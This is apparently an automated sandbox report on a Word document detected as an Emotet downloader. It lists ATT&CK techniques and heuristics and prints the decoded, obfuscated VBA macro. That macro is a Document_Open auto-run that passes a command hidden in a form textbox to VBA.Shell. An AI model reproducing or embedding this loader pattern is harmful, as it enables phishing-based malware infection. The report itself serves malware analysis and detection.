Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. ClamAV detection as 'Doc.Downloader.Emotet-6872645-0' strongly suggests the Emotet family and its downloader capabilities.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6872645-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6872645-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1983 bytes |

SHA-256 of macros.bas: 22a9ead0d2840841e61f6d866dca69bfde13e4b8ae9ceaa2f0e3134d444dd592
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim IrcSTp As Single
IrcSTp = Int(39192.497252085)
Dim SFypH As Byte
SFypH = 122
Dim FnfEuU5pX As Single
FnfEuU5pX = Sgn(30991.687716647)
If -168 + 232 = -1437 + 1442 Then
VJUet3sK = "C6FNaZMtR"
End If
Dim w4sk0CoR As Byte
w4sk0CoR = 90
Call z
End Sub
Attribute VB_Name = "te3RE2"
Sub Hjg7h1K()
End Sub
Public Sub z()
Dim FMZNLxt As Single
FMZNLxt = Sgn(53762.253692015)
Dim YC4lmx As Long
YC4lmx = 0
Dim R1Tbl As String
R1Tbl = Val("Q")
Dim oRjqu9raL As Boolean
oRjqu9raL = False
Dim QbGW2po8 As String
QbGW2po8 = Val(dZ5aDsu)
Dim JXgNwt As Long
JXgNwt = Sgn(0)
Dim gqw1bEWCO As Byte
gqw1bEWCO = 119
nnVmzl36 = VBA.Shell(LHN08X, 0)
End Sub
Attribute VB_Name = "aIzW4"
Sub VWP29obw0()
End Sub
Sub YZYo5()
End Sub
Sub E7HVB()
End Sub
Attribute VB_Name = "cXZdfnr"
Sub VlSpfV()
Dim xk7ZuHsV As Byte
xk7ZuHsV = 32
Dim e50cZjev As Byte
e50cZjev = 247
End Sub
Public Function LHN08X()
Dim np5glO As Double
np5glO = Fix(6793.8523434159)
Dim BGKS0VpZ As Byte
BGKS0VpZ = 180
Dim fnDmJ As Object
Dim dzrqT8 As Long
dzrqT8 = -1295325084
Dim qANbMoe
qANbMoe = LTrim(U0eaCH)
Set fnDmJ = New fm
Dim KPRiz
KPRiz = vbNullString
Dim BUJvBe As Boolean
BUJvBe = False
Dim xaIBphs
xaIBphs = LCase(Zh4M1EV)
Dim j4nrwtGRC
j4nrwtGRC = "8"
LHN08X = fnDmJ.mynewtxt.Text
End Function
Attribute VB_Name = "fm"
Attribute VB_Base = "0{782A6242-166A-4BBA-A3E1-13BD6A677933}{75BF4742-16E8-4555-A815-8BCC71B664F0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```